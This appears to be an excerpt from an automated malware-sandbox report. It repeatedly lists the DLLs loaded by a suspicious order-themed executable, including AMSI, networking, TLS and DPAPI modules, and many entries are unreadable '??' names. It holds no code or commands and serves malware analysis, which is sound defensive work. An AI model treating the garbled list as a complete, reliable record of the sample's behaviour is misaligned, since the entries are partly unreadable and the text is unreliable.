                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
